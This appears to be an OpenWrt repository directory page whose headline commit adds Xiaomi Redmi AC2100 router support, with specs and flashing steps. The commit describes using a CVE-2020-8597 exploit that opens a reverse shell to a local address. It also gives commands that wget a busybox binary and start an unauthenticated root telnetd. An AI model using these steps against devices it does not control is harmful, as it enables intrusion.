openwrt/package/boot/uboot-envtools/files
Richard Huynh f3792690c4 ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)
Specification:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN, in Amber and White
- UART: On board near ethernet, opposite side from power
- Modified u-boot

Installation:

1. Run linked exploit to get shell, startup telnet and wget the files over
2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0

Restore to stock:

1. Setup PXE and TFTP server serving stock firmware image
(See dhcp-boot option of dnsmasq)
2. Hold reset button down before powering on and wait for flashing amber led
3. Release reset button
4. Wait until status led changes from flashing amber to white

Notes:
This device has dual kernel and rootfs slots like other Xiaomi devices currently
supported (mir3g, etc.) thus, we use the second slot and overwrite the first
rootfs onwards in order to get more space.

Exploit and detailed instructions:

https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100

An implementation of CVE-2020-8597 against stock firmware version 1.0.14

This requires a computer with ethernet plugged into the wan port and an active
PPPoE session, and if successful will open a reverse shell to 192.168.31.177
on port 31337.

As this shell is somewhat unreliable and likely to be killed in a random amount
of time, it is recommended to wget a static compiled busybox binary onto the
device and start telnetd with it.

The stock telnetd and dropbear unfortunately appear inoperable.
(Disabled on release versions of stock firmware likely)
Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox
chmod a+x /tmp/busybox
/tmp/busybox telnetd -l /bin/sh

Tested-by: David Martinez <bonkilla@gmail.com>
Signed-off-by: Richard Huynh <voxlympha@gmail.com>
2020-05-20 15:26:22 +02:00
..
apm821xx apm821xx: add support for the Netgear WNDAP620 and WNDAP660 2018-11-26 12:05:46 +01:00
ar71xx uboot-envtools: ar71xx: add support for gl-ar150/-domino/-mifi 2020-01-23 14:04:50 +01:00
ath79 uboot-envtools: fix domywifi_dw33d Bad CRC error 2020-04-26 21:45:30 +02:00
cns3xxx treewide: use the generic board_name function 2017-07-15 23:13:34 +02:00
imx6 uboot-envtools: remove erasesize from MMC config 2019-10-21 12:28:03 +02:00
ipq40xx ipq40xx: Add support for Linksys EA8300 (Dallas) 2019-05-18 13:43:54 +02:00
ipq806x uboot-envtools: adds r7800 uboot env support 2018-10-07 02:12:06 +02:00
kirkwood kirkwood: add support for Iomega Storcenter ix2-200 2018-07-30 15:21:00 +02:00
lantiq lantiq: use the compatible string as board name 2017-12-16 23:33:56 +01:00
layerscape uboot-envtools: add configuration for Traverse LS1043 boards. 2018-07-30 10:53:57 +02:00
mpc85xx mpc85xx: add support for OCEDO Panda 2019-01-26 17:10:19 +01:00
mvebu mvebu: tidy up support for GL.iNet GL-MV1000 2020-04-27 00:25:12 +02:00
mxs uboot-envtools: mxs: add support for olimex, imx23-olinuxino 2020-03-08 15:10:55 +01:00
oxnas uboot-envtools: fix fw_env.config for ox820/stg-212 2019-04-11 19:21:55 +02:00
pistachio pistachio: remove custom board detection override 2017-03-22 11:43:22 +01:00
ramips ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100) 2020-05-20 15:26:22 +02:00
uboot-envtools.sh uboot-envtools: check for config prior to append 2019-12-17 19:35:16 +02:00